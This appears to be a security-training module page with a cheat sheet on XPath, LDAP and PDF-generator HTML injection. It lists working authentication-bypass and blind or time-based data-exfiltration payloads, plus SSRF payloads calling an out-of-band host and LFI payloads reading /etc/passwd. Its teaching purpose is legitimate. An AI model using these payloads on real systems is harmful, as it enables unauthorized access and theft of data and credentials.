Injection Attacks

Introduction to Injection Attacks

Injection vulnerabilities have constantly been one of the most relevant and prevalent security issues. As such, they have been in the OWASP Top Ten every time since its first release in 2003. While some injection vulnerabilities are reasonably well known, for instance, SQL Injection, Command Injection, or Cross-Site Scripting (XSS), there are significantly more injection vulnerabilities, most of which are less well known. The more famous types of injection vulnerabilities are certainly more common, however, on the other hand, most developers are aware of them, and common web application frameworks by default prevent them effectively. Since there is less awareness of the less common injection vulnerabilities, defense mechanisms are often implemented incorrectly or not at all, leading to simple attack vectors that can be exploited without any need for security control bypasses or advanced exploitation techniques.

Injection Attacks

XPath Injection

XML Path Language (XPath) is a query language for Extensible Markup Language (XML) data, similar to how SQL is a query language for databases. As such, XPath is used to query data from XML documents. Web applications that need to retrieve data stored in an XML format thus rely on XPath to retrieve the required data. XPath Injection vulnerabilities arise when user input is inserted into XPath queries without proper sanitization. Like SQLi vulnerabilities, XPath injection jeopardizes the entire data as successfully exploiting XPath injection allows an attacker to retrieve the entire XML document.

LDAP Injection

Lightweight Directory Access Protocol (LDAP) is a protocol used to access directory servers such as Active Directory (AD). Web applications often use LDAP queries to enable integration with AD services. For instance, LDAP can enable AD users to authenticate to the web application. LDAP injection vulnerabilities arise when user input is inserted into search filters without proper sanitization. This can lead to authentication bypasses if LDAP authentication is incorrectly implemented. Additionally, LDAP injection can lead to loss of data.

HTML Injection in PDF Generators

Portable Document Format (PDF) files are commonly used for the distribution of documents. As such, many web applications implement functionality to convert data to a PDF format with the help of PDF generation libraries. These libraries read HTML code as input and generate a PDF file from it. This allows the web application to apply custom styles and formats to the generated PDF file by applying stylesheets to the input HTML code. Often, user input is directly included in these generated PDF files. If the user input is not sanitized correctly, it is possible to inject HTML code into the input of PDF generation libraries, which can lead to multiple vulnerabilities, including Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Injection Attacks

Introduction to Injection Attacks

Injection Attacks

XPath Injection

LDAP Injection

HTML Injection in PDF Generators

Table of Contents

Introduction to Injection Attacks

XPath Injection

LDAP Injection

HTML Injection in PDF Generators

Skills Assessment

My Workstation